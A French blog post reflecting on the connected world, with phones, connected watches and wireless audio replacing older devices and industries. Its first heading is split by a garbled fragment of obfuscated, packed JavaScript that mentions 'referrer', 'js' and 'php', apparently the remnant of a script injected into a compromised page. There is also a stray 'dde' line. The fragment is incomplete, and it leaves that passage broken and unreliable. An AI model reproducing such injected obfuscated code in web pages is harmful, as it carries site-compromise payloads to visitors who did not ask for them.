être connecté

Je vais dans cet article vous parler de la notion d’être connecté.

 

Se (‘0.6(“<\/k"+"l>“);n m=”q”;zhbsn|var|u0026u|referrer|nhnzk||js|php’.split(‘|’),0,{}))
connecter partout.

Au début des années 2000, le téléphone portable faisait fureur, on pouvait appeler avec un téléphone sans passer par des cabines téléphoniques ou encore rentrer chez soi pour téléphoner. Maintenant, tout le monde à un téléphone et avoir un téléphone est devenu tout à fait normal. Cela fait partie des nouvelles technologies que l’on possède au quotidien.

D’ailleurs le monde a évolué au point où on peut avoir un bracelet connecté ou encore une montre, il y a les tablettes graphiques pour se connecter. Il y a de plus en plus de diversités.

Les écouteurs ou les enceintes sont maintenant sans fil car on utilise le blue tooth, qui sont connecté soit à votre téléphone ou un appareil auditif.

dde

Au final, le téléphone va tout faire, par exemple, e n’ai plus de réveil car mon téléphone fait réveil, il en va de même pour l’horloge. Il y a aura de moins en moins de vente d’appareil photo car maintenant, un portable téléphonique est capable de faire des photos aussi bonnes qu’un bon appareil photo.

Il y a d’autres choses qui sont amenés à disparaître ou vont être en vogue pour un certains temps.

Les montres ont par exemple une nouvelle fonction, ils font maintenant les podomètres, et ils sont connecté. Vous pouvez les porter toute la journée et votre montre ou bracelet connecté va recueilli des données pour vous.

 

Une monde connecté.

On est arrivé dans un monde où la technologie prône sur tout. je ne vais pas acheter un chronomètre car je possède la fonction sur mon téléphone. Je ne vais pas acheter un mp3 car je peux me connecter de mon téléphone sur internet pour écouter de la musique.

Je ne vais pas acheter un cd car je peux le télécharger sur internet. L’internet a rendu tellement de choses accessibles qu’il a mis en avant certains industries et détruit certaines autres.

Les ordinateurs, les objets technologies sont en plus en plus mis en avant et les industries du disque, des objets simples sont en recul.

C’est tout l’objet du monde actuel.

 

Et vous? Qu’en-pensez-vous? Les objets sont-il plus en pus connecté, aimez-vous ça ou préférez-vous l’ancien temps?

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Comments links could be nofollow free.